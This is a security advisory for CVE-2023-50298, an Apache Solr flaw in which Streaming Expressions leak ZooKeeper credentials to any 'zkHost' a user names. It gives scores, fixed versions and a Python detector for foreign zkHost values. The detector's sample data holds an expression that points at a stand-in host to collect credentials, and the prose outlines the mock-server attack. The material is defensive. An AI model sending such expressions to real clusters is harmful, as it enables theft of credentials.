CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.001 Low
Percentile: 19.4%

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in
Apache Solr. This issue affects Apache Solr: from 6.0.0 through 8.11.2, from
9.0.0 before 9.4.1. Solr Streaming Expressions allow users to extract data
from other Solr Clouds, using a “zkHost” parameter. When the original SolrCloud
is set up to use ZooKeeper credentials and ACLs, they will be sent to
whatever “zkHost” the user provides. An attacker could set up a server to
mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs
and extracts the sensitive information, then send a streaming expression
using the mock server’s address in “zkHost”. Streaming Expressions are
exposed via the “/streaming” handler, with “read” permissions. Users are
recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.
From these versions on, only zkHost values that have the same server
address (regardless of chroot) will use the given ZooKeeper credentials
and ACLs when connecting.
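
The following is an added example, not code from Apache Solr or from this advisory: a review helper that flags streaming expressions whose “zkHost” points at servers other than the cluster's own ZooKeeper ensemble, ignoring the chroot as the fixed versions do. It assumes that “same server address” means an identical set of host:port entries; the function names, host names and sample expressions are constructed for illustration.

```python
import re

ZK_DEFAULT_PORT = 2181  # ZooKeeper's default client port

def zk_servers(zk_host):
    """Return the (host, port) pairs of a zkHost string, ignoring any chroot."""
    servers = set()
    # Everything after the first "/" is the chroot and is dropped.
    for entry in zk_host.strip().split("/", 1)[0].split(","):
        entry = entry.strip().lower()
        if not entry:
            continue
        host, sep, port = entry.rpartition(":")
        if not sep or not port.isdigit():  # no port given, e.g. "zk1" or "[::1]"
            host, port = entry, str(ZK_DEFAULT_PORT)
        servers.add((host, int(port)))
    return frozenset(servers)

# zkHost="..." as a named parameter anywhere in a (possibly nested) expression
ZKHOST_PARAM = re.compile(r'zkHost\s*=\s*"([^"]*)"')

def foreign_zk_hosts(expr, cluster_zk_host):
    """List zkHost values in expr whose servers differ from the cluster's own."""
    own = zk_servers(cluster_zk_host)
    return [v for v in ZKHOST_PARAM.findall(expr) if zk_servers(v) != own]

# Constructed sample data: hypothetical host names and a documentation-range IP.
CLUSTER_ZK_HOST = "zk1.example.internal:2181,zk2.example.internal:2181/solr"
SAMPLE_EXPRESSIONS = [
    # No zkHost: runs against the local cluster.
    'search(logs, q="*:*", fl="id", sort="id asc")',
    # Same ensemble, different order and chroot: credentials stay in-house.
    'search(logs, zkHost="zk2.example.internal:2181,zk1.example.internal/other",'
    ' q="*:*", fl="id", sort="id asc")',
    # Different server: on affected versions this host receives the credentials.
    'search(logs, zkHost="198.51.100.7:2181", q="*:*", fl="id", sort="id asc")',
]

if __name__ == "__main__":
    for expr in SAMPLE_EXPRESSIONS:
        hits = foreign_zk_hosts(expr, CLUSTER_ZK_HOST)
        print("FLAG" if hits else "ok  ", hits, expr[:45])
```

On affected versions a flagged expression is a reason to rotate the ZooKeeper credentials as well as to upgrade.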
launchpad.net/bugs/cve/CVE-2023-50298
nvd.nist.gov/vuln/detail/CVE-2023-50298
security-tracker.debian.org/tracker/CVE-2023-50298
solr.apache.org/security.html#cve-2023-50298-apache-solr-can-expose-zookeeper-credentials-via-streaming-expressions
www.cve.org/CVERecord?id=CVE-2023-50298
www.openwall.com/lists/oss-security/2024/02/09/2